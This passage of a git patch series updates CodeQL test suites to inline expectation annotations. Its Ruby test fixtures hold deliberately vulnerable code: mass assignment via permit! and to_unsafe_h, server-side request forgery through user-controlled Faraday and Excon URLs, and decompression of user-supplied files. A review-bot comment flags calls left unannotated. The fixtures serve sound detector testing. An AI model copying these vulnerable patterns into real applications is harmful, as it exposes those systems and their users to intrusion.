params.require(:user).permit! + params.require(:user).permit! # $ Source end def create4 - x = params[:user] + x = params[:user] # $ Source x.permit! 
- User.new(x) # BAD + User.new(x) # BAD # $ Alert User.new(x.permit(:name,:address)) # GOOD - User.new(params.permit(user: {})) # BAD - User.new(params.permit(user: [:name, :address, {friends:{}}])) # BAD - User.new(params.to_unsafe_h) # BAD + User.new(params.permit(user: {})) # BAD # $ Alert + User.new(params.permit(user: [:name, :address, {friends:{}}])) # BAD # $ Alert + User.new(params.to_unsafe_h) # BAD # $ Alert User.new(params.permit(user: [:name, :address]).to_unsafe_h) # GOOD end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected index c97ff12fc3d0..26740b5e3f20 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected 
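Review bot: In `create3` the comment says `# each BAD`, yet `User.insert_all([user_params])`, `User.insert_all!([user_params])`, `User.upsert([user_params])` and `user.update(user_params)` are left without any annotation while every neighbouring call gets `# $ Alert`. None of them has a row in MassAssignment.expected, so they look like mass-assignment cases the query does not currently flag. Marking each with `# $ MISSING: Alert` would document those false negatives and make the test fail visibly once the query starts catching them. `create3` begins before this hunk's first changed line, and its `# each BAD` comment is the only statement of intent visible here.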
@@ -1,3 +1,7 @@ +#select +| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | +| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | +| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | edges | ServerSideRequestForgery.rb:10:9:10:28 | users_service_domain | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | provenance | AdditionalTaintStep | | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:10:32:10:60 | ...[...] | provenance | | 
@@ -14,7 +18,3 @@ nodes | ServerSideRequestForgery.rb:20:45:20:50 | call to params | semmle.label | call to params | | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | semmle.label | ...[...] | subpaths -#select -| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | -| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | -| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref index 34f3a2952f27..615ca40af22a 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.qlref @@ -1 +1,2 @@ -queries/security/cwe-918/ServerSideRequestForgery.ql +query: queries/security/cwe-918/ServerSideRequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb index ff99ffe1801c..f2ff6825b7d4 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.rb 
@@ -7,17 +7,17 @@ def create user = params[:user_id] # BAD - user can control the entire URL of the request - users_service_domain = params[:users_service_domain] - response = Excon.post("#{users_service_domain}/logins", body: {user_id: user}).body + users_service_domain = params[:users_service_domain] # $ Source + response = Excon.post("#{users_service_domain}/logins", body: {user_id: user}).body # $ Alert token = JSON.parse(response)["token"] # BAD - user can control the entire URL for the request using Faraday library - conn = Faraday.new(url: params[:url]) + conn = Faraday.new(url: params[:url]) # $ Alert resp = conn.post token = JSON.parse(resp)["token"] # BAD - user can control the entire URL for the request using Faraday::Connection library - conn = Faraday::Connection.new(url: params[:url]) + conn = Faraday::Connection.new(url: params[:url]) # $ Alert resp = conn.post token = JSON.parse(resp)["token"] diff --git a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected index 20be59524bfa..67bfd8f8762d 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected +++ b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected 
@@ -1,3 +1,6 @@ +#select +| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | +| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | edges | decompression_api.rb:4:9:4:12 | path | decompression_api.rb:5:31:5:34 | path | provenance | | | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:4:16:4:28 | ...[...] | provenance | | 
@@ -11,6 +14,3 @@ nodes | decompression_api.rb:15:31:15:36 | call to params | semmle.label | call to params | | decompression_api.rb:15:31:15:43 | ...[...] | semmle.label | ...[...] | subpaths -#select -| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | -| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | diff --git a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref index feb45b822208..4d63d1ce6246 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref +++ b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.qlref @@ -1 +1,2 @@ -experimental/decompression-api/DecompressionApi.ql \ No newline at end of file +query: experimental/decompression-api/DecompressionApi.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb b/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb index 6c1daa144e2f..18da3c4bc023 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb +++ b/ruby/ql/test/query-tests/security/decompression-api/decompression_api.rb 
@@ -1,8 +1,8 @@ class TestController < ActionController::Base # this should get picked up def unsafe_zlib_unzip - path = params[:file] - Zlib::Inflate.inflate(path) + path = params[:file] # $ Source + Zlib::Inflate.inflate(path) # $ Alert end # this should not get picked up @@ -12,7 +12,7 @@ def safe_zlib_unzip # this should get picked up def unsafe_zlib_unzip - Zip::File.open_buffer(params[:file]) + Zip::File.open_buffer(params[:file]) # $ Alert end # this should not get picked up diff --git a/ruby/ql/test/query-tests/summary/LinesOfCode.qlref b/ruby/ql/test/query-tests/summary/LinesOfCode.qlref index 84278cfc96b7..0478c9ec2f5c 100644 --- a/ruby/ql/test/query-tests/summary/LinesOfCode.qlref +++ b/ruby/ql/test/query-tests/summary/LinesOfCode.qlref @@ -1 +1 @@ -queries/summary/LinesOfCode.ql \ No newline at end of file +query: queries/summary/LinesOfCode.ql diff --git a/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref b/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref index 4114db632a26..45caa1400d7d 100644 --- a/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref +++ b/ruby/ql/test/query-tests/summary/LinesOfUserCode.qlref @@ -1 +1 @@ -queries/summary/LinesOfUserCode.ql \ No newline at end of file +query: queries/summary/LinesOfUserCode.ql diff --git a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref index 8407cd817f14..e1f3141a439d 100644 --- a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref +++ b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeAccessPaths.qlref @@ -1 +1 @@ -utils/modeleditor/FrameworkModeAccessPaths.ql +query: utils/modeleditor/FrameworkModeAccessPaths.ql diff --git a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref index 91b8e89b85f5..ec216021687b 100644 
--- a/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref
+++ b/ruby/ql/test/query-tests/utils/modeleditor/FrameworkModeEndpoints.qlref
@@ -1 +1 @@
-utils/modeleditor/FrameworkModeEndpoints.ql
+query: utils/modeleditor/FrameworkModeEndpoints.ql
diff --git a/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref b/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref
index 2ad420fa620e..07e780838762 100644
--- a/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref
+++ b/ruby/ql/test/query-tests/utils/modeleditor/GenerateModel.qlref
@@ -1 +1 @@
-queries/modeling/GenerateModel.ql
+query: queries/modeling/GenerateModel.ql
From cf1e0641312e0a16f878afa4729231b6c6be14c6 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:58:41 +0200 Subject: [PATCH 07/15] rust --- rust/ql/integration-tests/hello-project/ExtractionErrors.qlref | 2 +- .../ql/integration-tests/hello-project/ExtractionWarnings.qlref | 2 +- rust/ql/integration-tests/hello-project/summary.qlref | 2 +- .../ql/integration-tests/hello-workspace/ExtractionErrors.qlref | 2 +- .../integration-tests/hello-workspace/ExtractionWarnings.qlref | 2 +- rust/ql/integration-tests/hello-workspace/summary.qlref | 2 +- rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref | 2 +- rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref | 2 +- rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref | 2 +- rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref | 2 +- .../query-tests/diagnostics/DataFlowConsistencyCounts.qlref | 2 +- rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref | 2 +- rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref | 2 +- rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref | 2 +- rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref | 2 +- rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref | 2 +- .../test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref | 2 +- rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref | 2 +- rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref | 2 +- rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref | 2 +- rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref | 2 +- 21 files changed, 21 insertions(+), 21 deletions(-) diff --git a/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref b/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref index ba4f854d6a10..9169d655e25c 100644 --- a/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref +++ b/rust/ql/integration-tests/hello-project/ExtractionErrors.qlref @@ -1 +1 @@ -queries/diagnostics/ExtractionErrors.ql +query: queries/diagnostics/ExtractionErrors.ql 
diff --git a/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref b/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref
index ff6e566d20a7..24af39e23262 100644
--- a/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref
+++ b/rust/ql/integration-tests/hello-project/ExtractionWarnings.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionWarnings.ql
+query: queries/diagnostics/ExtractionWarnings.ql
diff --git a/rust/ql/integration-tests/hello-project/summary.qlref b/rust/ql/integration-tests/hello-project/summary.qlref
index 926fc7903911..1e9346a81a8c 100644
--- a/rust/ql/integration-tests/hello-project/summary.qlref
+++ b/rust/ql/integration-tests/hello-project/summary.qlref
@@ -1 +1 @@
-queries/summary/SummaryStatsReduced.ql
+query: queries/summary/SummaryStatsReduced.ql
diff --git a/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref b/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref
index ba4f854d6a10..9169d655e25c 100644
--- a/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref
+++ b/rust/ql/integration-tests/hello-workspace/ExtractionErrors.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionErrors.ql
+query: queries/diagnostics/ExtractionErrors.ql
diff --git a/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref b/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref
index ff6e566d20a7..24af39e23262 100644
--- a/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref
+++ b/rust/ql/integration-tests/hello-workspace/ExtractionWarnings.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionWarnings.ql
+query: queries/diagnostics/ExtractionWarnings.ql
diff --git a/rust/ql/integration-tests/hello-workspace/summary.qlref b/rust/ql/integration-tests/hello-workspace/summary.qlref
index 926fc7903911..1e9346a81a8c 100644
--- a/rust/ql/integration-tests/hello-workspace/summary.qlref
+++ b/rust/ql/integration-tests/hello-workspace/summary.qlref
@@ -1 +1 @@
-queries/summary/SummaryStatsReduced.ql
+query: queries/summary/SummaryStatsReduced.ql
diff --git a/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref b/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref
index ee3c14c56f15..d8d07ef1184f 100644
--- a/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref
+++ b/rust/ql/test/extractor-tests/macro-expansion/PrintAst.qlref
@@ -1 +1 @@
-utils/PrintAst.ql
+query: utils/PrintAst.ql
diff --git a/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref b/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref
index ee3c14c56f15..d8d07ef1184f 100644
--- a/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref
+++ b/rust/ql/test/extractor-tests/macro-in-library/PrintAst.qlref
@@ -1 +1 @@
-utils/PrintAst.ql
+query: utils/PrintAst.ql
diff --git a/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref
index 68d587b883e3..8b940c0d01ec 100644
--- a/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref
+++ b/rust/ql/test/query-tests/diagnostics/AstConsistencyCounts.qlref
@@ -1 +1 @@
-queries/diagnostics/AstConsistencyCounts.ql
+query: queries/diagnostics/AstConsistencyCounts.ql
diff --git a/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref
index 6e7ffa8aaa9d..fb180bf64bb2 100644
--- a/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref
+++ b/rust/ql/test/query-tests/diagnostics/CfgConsistencyCounts.qlref
@@ -1 +1 @@
-queries/diagnostics/CfgConsistencyCounts.ql
+query: queries/diagnostics/CfgConsistencyCounts.ql
diff --git a/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref
index 128d80b22913..c3b3fb00c93c 100644
--- a/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref
+++ b/rust/ql/test/query-tests/diagnostics/DataFlowConsistencyCounts.qlref
@@ -1 +1 @@
-queries/diagnostics/DataFlowConsistencyCounts.ql
+query: queries/diagnostics/DataFlowConsistencyCounts.ql
diff --git a/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref b/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref
index cd1996e606b6..ed3e1b70d3ec 100644
--- a/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref
+++ b/rust/ql/test/query-tests/diagnostics/ExtractedFiles.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractedFiles.ql
+query: queries/diagnostics/ExtractedFiles.ql
diff --git a/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref b/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref
index ffbdb0a7b1b5..9169d655e25c 100644
--- a/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref
+++ b/rust/ql/test/query-tests/diagnostics/ExtractionErrors.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionErrors.ql
\ No newline at end of file
+query: queries/diagnostics/ExtractionErrors.ql
diff --git a/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref b/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref
index ff6e566d20a7..24af39e23262 100644
--- a/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref
+++ b/rust/ql/test/query-tests/diagnostics/ExtractionWarnings.qlref
@@ -1 +1 @@
-queries/diagnostics/ExtractionWarnings.ql
+query: queries/diagnostics/ExtractionWarnings.ql
diff --git a/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref b/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref
index 6b283550e622..0478c9ec2f5c 100644
--- a/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref
+++ b/rust/ql/test/query-tests/diagnostics/LinesOfCode.qlref
@@ -1 +1 @@
-queries/summary/LinesOfCode.ql
+query: queries/summary/LinesOfCode.ql
diff --git a/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref b/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref
index 73feb9152774..45caa1400d7d 100644
--- a/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref
+++ b/rust/ql/test/query-tests/diagnostics/LinesOfUserCode.qlref
@@ -1 +1 @@
-queries/summary/LinesOfUserCode.ql
+query: queries/summary/LinesOfUserCode.ql
diff --git a/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref b/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref
index da3e8f72ed9a..ffc0095c1a05 100644
--- a/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref
+++ b/rust/ql/test/query-tests/diagnostics/LinesOfUserCodeInFiles.qlref
@@ -1 +1 @@
-queries/summary/LinesOfUserCodeInFiles.ql
+query: queries/summary/LinesOfUserCodeInFiles.ql
diff --git a/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref b/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref
index 40242e81c245..f43cb8682910 100644
--- a/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref
+++ b/rust/ql/test/query-tests/diagnostics/SsaConsistencyCounts.qlref
@@ -1 +1 @@
-queries/diagnostics/SsaConsistencyCounts.ql
+query: queries/diagnostics/SsaConsistencyCounts.ql
diff --git a/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref b/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref
index 926fc7903911..1e9346a81a8c 100644
--- a/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref
+++ b/rust/ql/test/query-tests/diagnostics/SummaryStatsReduced.qlref
@@ -1 +1 @@
-queries/summary/SummaryStatsReduced.ql
+query: queries/summary/SummaryStatsReduced.ql
diff --git a/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref b/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref
index e02770f843d7..119addad1880 100644
--- a/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref
+++ b/rust/ql/test/query-tests/diagnostics/UnextractedElements.qlref
@@ -1 +1 @@
-queries/diagnostics/UnextractedElements.ql
+query: queries/diagnostics/UnextractedElements.ql
diff --git a/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref b/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref
index 77f337e27032..3435d38ebe72 100644
--- a/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref
+++ b/rust/ql/test/query-tests/diagnostics/UnresolvedMacroCalls.qlref
@@ -1 +1 @@
-queries/diagnostics/UnresolvedMacroCalls.ql
+query: queries/diagnostics/UnresolvedMacroCalls.ql
From 212e9d07fd9116ace47e8009a6f2b3ce28e25378 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:58:52 +0200 Subject: [PATCH 08/15] Swift --- .../decl/CapturedDecl/PrintAst.qlref | 2 +- .../extractor-tests/updates/PrintAst.qlref | 2 +- swift/ql/test/library-tests/ast/Errors.qlref | 2 +- .../elements/expr/methodlookup/PrintAst.qlref | 2 +- .../library-tests/hidden-ast/PrintAst.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../SuccessfullyExtractedLines.qlref | 2 +- .../CWE-020/IncompleteHostnameRegex.qlref | 3 +- .../Security/CWE-020/MissingRegexAnchor.qlref | 3 +- .../Security/CWE-020/SemiAnchoredRegex.swift | 64 ++-- .../Security/CWE-020/UnanchoredUrlRegex.swift | 32 +- .../query-tests/Security/CWE-020/test.swift | 44 +-- .../UnsafeUnpack/UnsafeUnpack.expected | 6 +- .../CWE-022/UnsafeUnpack/UnsafeUnpack.qlref | 3 +- .../CWE-022/UnsafeUnpack/UnsafeUnpack.swift | 6 +- .../Security/CWE-078/CommandInjection.qlref | 2 +- .../CWE-079/UnsafeWebViewFetch.expected | 38 +-- .../Security/CWE-079/UnsafeWebViewFetch.qlref | 3 +- .../Security/CWE-079/UnsafeWebViewFetch.swift | 40 +-- .../query-tests/Security/CWE-089/GRDB.swift | 192 ++++++------ .../query-tests/Security/CWE-089/SQLite.swift | 32 +- .../Security/CWE-089/SqlInjection.expected | 228 +++++++------- .../Security/CWE-089/SqlInjection.qlref | 3 +- .../query-tests/Security/CWE-089/other.swift | 14 +- .../Security/CWE-089/sqlite3_c_api.swift | 20 +- .../Security/CWE-116/BadTagFilter.qlref | 3 +- .../query-tests/Security/CWE-116/test.swift | 64 ++-- .../StaticInitializationVector.expected | 60 ++-- .../CWE-1204/StaticInitializationVector.qlref | 3 +- .../Security/CWE-1204/rncryptor.swift | 24 +- .../query-tests/Security/CWE-1204/test.swift | 46 +-- .../query-tests/Security/CWE-1333/ReDoS.qlref | 3 +- .../query-tests/Security/CWE-1333/ReDoS.swift | 16 +- .../CWE-134/UncontrolledFormatString.expected | 48 +-- .../CWE-134/UncontrolledFormatString.qlref | 3 +- .../CWE-134/UncontrolledFormatString.swift | 48 
+-- .../CWE-135/StringLengthConflation.qlref | 2 +- .../CWE-259/ConstantPassword.expected | 54 ++-- .../Security/CWE-259/ConstantPassword.qlref | 3 +- .../Security/CWE-259/rncryptor.swift | 38 +-- .../query-tests/Security/CWE-259/test.swift | 20 +- .../CWE-311/CleartextStorageDatabase.expected | 280 +++++++++--------- .../CWE-311/CleartextStorageDatabase.qlref | 3 +- .../CWE-311/CleartextTransmission.expected | 64 ++-- .../CWE-311/CleartextTransmission.qlref | 3 +- .../query-tests/Security/CWE-311/SQLite.swift | 74 ++--- .../Security/CWE-311/sqlite3_c_api.swift | 10 +- .../Security/CWE-311/testAlamofire.swift | 6 +- .../Security/CWE-311/testCoreData.swift | 40 +-- .../Security/CWE-311/testCoreData2.swift | 56 ++-- .../Security/CWE-311/testGRDB.swift | 102 +++---- .../Security/CWE-311/testRealm.swift | 10 +- .../Security/CWE-311/testRealm2.swift | 14 +- .../Security/CWE-311/testSend.swift | 36 +-- .../Security/CWE-311/testURL.swift | 30 +- .../CleartextStoragePreferences.expected | 32 +- .../CWE-312/CleartextStoragePreferences.qlref | 3 +- .../testNSUbiquitousKeyValueStore.swift | 24 +- .../Security/CWE-312/testUserDefaults.swift | 26 +- .../CWE-321/HardcodedEncryptionKey.qlref | 2 +- .../Security/CWE-327/ECBEncryption.expected | 20 +- .../Security/CWE-327/ECBEncryption.qlref | 3 +- .../query-tests/Security/CWE-327/test.swift | 22 +- .../CWE-328/WeakPasswordHashing.expected | 98 +++--- .../CWE-328/WeakPasswordHashing.qlref | 3 +- .../CWE-328/WeakSensitiveDataHashing.expected | 74 ++--- .../CWE-328/WeakSensitiveDataHashing.qlref | 3 +- .../Security/CWE-328/testCryptoKit.swift | 110 +++---- .../Security/CWE-328/testCryptoSwift.swift | 68 ++--- .../Security/CWE-730/RegexInjection.expected | 48 +-- .../Security/CWE-730/RegexInjection.qlref | 3 +- .../query-tests/Security/CWE-730/tests.swift | 48 +-- .../Security/CWE-757/InsecureTLS.qlref | 2 +- .../Security/CWE-760/ConstantSalt.expected | 38 +-- .../Security/CWE-760/ConstantSalt.qlref | 3 +- 
.../Security/CWE-760/rncryptor.swift | 24 +- .../query-tests/Security/CWE-760/test.swift | 20 +- .../InsufficientHashIterations.expected | 10 +- .../CWE-916/InsufficientHashIterations.qlref | 3 +- .../query-tests/Security/CWE-916/test.swift | 10 +- 81 files changed, 1314 insertions(+), 1295 deletions(-) diff --git a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref +++ b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql diff --git a/swift/ql/test/extractor-tests/updates/PrintAst.qlref b/swift/ql/test/extractor-tests/updates/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/extractor-tests/updates/PrintAst.qlref +++ b/swift/ql/test/extractor-tests/updates/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql diff --git a/swift/ql/test/library-tests/ast/Errors.qlref b/swift/ql/test/library-tests/ast/Errors.qlref index 7441b24678d8..a1c638c8fca6 100644 --- a/swift/ql/test/library-tests/ast/Errors.qlref +++ b/swift/ql/test/library-tests/ast/Errors.qlref @@ -1 +1 @@ -extractor-tests/errors/Errors.ql +query: extractor-tests/errors/Errors.ql diff --git a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref +++ b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql 
diff --git a/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref b/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref
index f7d7d0c4fcbd..d4d4213d1ede 100644
--- a/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref
+++ b/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref
@@ -1 +1 @@
-library-tests/ast/PrintAst.ql
+query: library-tests/ast/PrintAst.ql
diff --git a/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref
index 9d7833eccae7..dc898fca718c 100644
--- a/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref
+++ b/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref
@@ -1 +1 @@
-AlertSuppression.ql
+query: AlertSuppression.ql
diff --git a/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
index f0e7bd917f84..3c5f5df7c8b1 100644
--- a/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref
